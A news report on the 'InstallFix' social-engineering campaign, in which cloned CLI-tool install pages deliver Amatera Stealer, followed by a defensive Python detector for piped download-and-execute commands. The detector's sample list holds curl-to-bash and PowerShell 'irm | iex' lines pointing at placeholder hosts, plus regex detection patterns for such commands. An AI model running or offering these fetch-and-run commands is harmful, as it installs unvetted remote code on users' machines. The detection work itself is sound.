Cybercriminals use ‘InstallFix’ social engineering technique to spread data-stealing malware
Security researchers have uncovered a new social engineering tactic called InstallFix that tricks users into running malicious commands disguised as legitimate CLI tool installations, potentially exposing sensitive data such as credentials and cryptocurrency wallets.
Cybersecurity researchers have identified a new social engineering tactic called InstallFix, which threat actors are using to trick users into executing malicious commands disguised as legitimate software installation steps.
The technique builds on the previously known ClickFix approach and primarily targets users who install command-line interface (CLI) tools from online sources. According to researchers at Push Security, attackers create fake installation pages that closely resemble official documentation pages for popular developer tools.
These pages appear authentic, featuring identical layouts, branding elements, and navigation links. However, the installation instructions displayed on these cloned sites contain altered commands designed to install malware instead of legitimate software.
Fake installation pages target CLI tool users
The fraudulent pages mimic official documentation for developer utilities such as Claude Code, a CLI coding assistant developed by Anthropic. Most links on a cloned page point to the legitimate sources, but the installation commands shown for operating systems such as macOS and Windows are altered so that copying and running them triggers a malicious download instead of the real installer.
Users who follow these instructions may unknowingly execute commands that install harmful software on their systems. Researchers warn that the attack is particularly deceptive because victims can continue browsing legitimate documentation after running the malicious command, making it harder to detect the compromise.
Attackers are promoting these fake pages through sponsored advertisements in search results, including ads appearing on Google search queries related to installing CLI tools.
Amatera Stealer malware delivered through attacks
Once the malicious command is executed, systems may be infected with Amatera Stealer, a relatively new malware strain designed to steal sensitive information. The malware targets stored browser data such as passwords, cookies, and session tokens, while also attempting to extract cryptocurrency wallet information and system details.
Security analysts believe Amatera is derived from the ACR Stealer malware family and is offered to cybercriminals under a malware-as-a-service model.
Researchers also noted that many of the malicious websites are hosted on legitimate platforms, including Cloudflare and Squarespace, which helps attackers evade detection.
Security experts advise users to download software only from verified sources, avoid clicking sponsored search results when installing developer tools, and carefully review installation commands before executing them.
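The last piece of advice above, reviewing an installation command before running it, can be turned into a mechanical check. The script below is an added example, not code from Push Security or from any of the projects named in the article. It looks for the two properties the campaign relies on: a download piped straight into an interpreter (`curl ... | bash`, `irm ... | iex`, and the pipe-less `iex (irm ...)` and `sh -c "$(curl ...)"` forms), and a download host that is not on an allow-list of official documentation domains. The allow-list is an illustrative assumption, and the sample command lines are constructed to show the pattern; they are not the actual commands used in the InstallFix pages.

```python
import re
from urllib.parse import urlparse

# Hosts this script treats as legitimate sources of installer scripts.
# ASSUMPTION: an illustrative allow-list, not a vetted one; build your own
# from the documentation pages your organisation actually trusts.
ALLOWED_INSTALL_HOSTS = {
    "claude.ai",
    "github.com",
    "raw.githubusercontent.com",
}

# Left-hand side of a download-and-execute one-liner (POSIX and PowerShell).
FETCH_TOOLS = re.compile(
    r"\b(?:curl|wget|irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b", re.IGNORECASE)
# Right-hand side: an interpreter that runs whatever it reads from stdin.
# Anchored to the start of the pipe segment so 'tee install.sh' is not a sink.
SHELL_SINKS = re.compile(
    r"^\s*(?:sudo\s+)?(?:sh|bash|zsh|iex|Invoke-Expression)\b", re.IGNORECASE)
# PowerShell 'iex (irm ...)' and POSIX 'sh -c "$(curl ...)"' need no pipe at all.
INLINE_EXEC = re.compile(
    r"\b(?:iex|Invoke-Expression)\s*\(\s*(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b"
    r"|\b(?:sh|bash|zsh)\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"|;&<>()]+", re.IGNORECASE)
# A single '|' (not the '||' logical-or operator).
PIPE_SPLIT = re.compile(r"(?<!\|)\|(?!\|)")


def extract_hosts(cmdline):
    """Hostnames of every URL embedded in the command line, lower-cased."""
    return [(urlparse(u).hostname or "").lower() for u in URL_RE.findall(cmdline)]


def executes_download(cmdline):
    """True when fetched content is handed to an interpreter unread."""
    if INLINE_EXEC.search(cmdline):
        return True
    fetch_seen = False
    for segment in PIPE_SPLIT.split(cmdline):
        # A sink only counts once a fetch tool appeared in an earlier segment.
        if fetch_seen and SHELL_SINKS.search(segment):
            return True
        if FETCH_TOOLS.search(segment):
            fetch_seen = True
    return False


def review_install_command(cmdline, allowed_hosts=ALLOWED_INSTALL_HOSTS):
    """Classify one install command copied from a documentation page.

    Returns (verdict, reasons): 'block' when a download is executed unread from
    a host that is not allow-listed, 'review' when only one of those holds,
    'ok' when neither does.
    """
    reasons = []
    unknown = sorted({h for h in extract_hosts(cmdline) if h not in allowed_hosts})
    piped = executes_download(cmdline)
    if piped:
        reasons.append("downloaded content is executed without being inspected")
    if unknown:
        reasons.append("host(s) not on the allow-list: " + ", ".join(unknown))
    if piped and unknown:
        return "block", reasons
    if piped or unknown:
        return "review", reasons
    return "ok", reasons


def scan_command_log(lines, allowed_hosts=ALLOWED_INSTALL_HOSTS):
    """Run the check over process-creation or shell-history lines; return the hits."""
    hits = []
    for line in lines:
        verdict, reasons = review_install_command(line, allowed_hosts)
        if verdict != "ok":
            hits.append((verdict, line, reasons))
    return hits


# Constructed sample command lines (not the campaign's actual commands;
# '.example' is a reserved TLD, so nothing here points at a real host).
SAMPLE_COMMANDS = [
    "curl -fsSL https://claude.ai/install.sh | bash",
    "curl -fsSL https://install-claude-code.example/setup.sh | sudo bash",
    'powershell -ExecutionPolicy Bypass -c "irm https://cli-setup.example/i.ps1 | iex"',
    "iex (irm https://cli-setup.example/i.ps1)",
    "npm install -g some-cli-tool",
]

if __name__ == "__main__":
    for verdict, line, reasons in scan_command_log(SAMPLE_COMMANDS):
        print(f"{verdict:6s} {line}")
        for reason in reasons:
            print(f"       - {reason}")
```

Two design points. An allow-listed host still gets a "review" verdict when the command pipes into a shell, because the safe habit is to download the script to a file and read it before running it regardless of where it came from; a look-alike domain with a trusted brand in its name (the second sample) is exactly what the allow-list is there to catch. The same function works as a detection over endpoint process-creation or shell-history lines, which is how a defender would find a user who has already followed a cloned page.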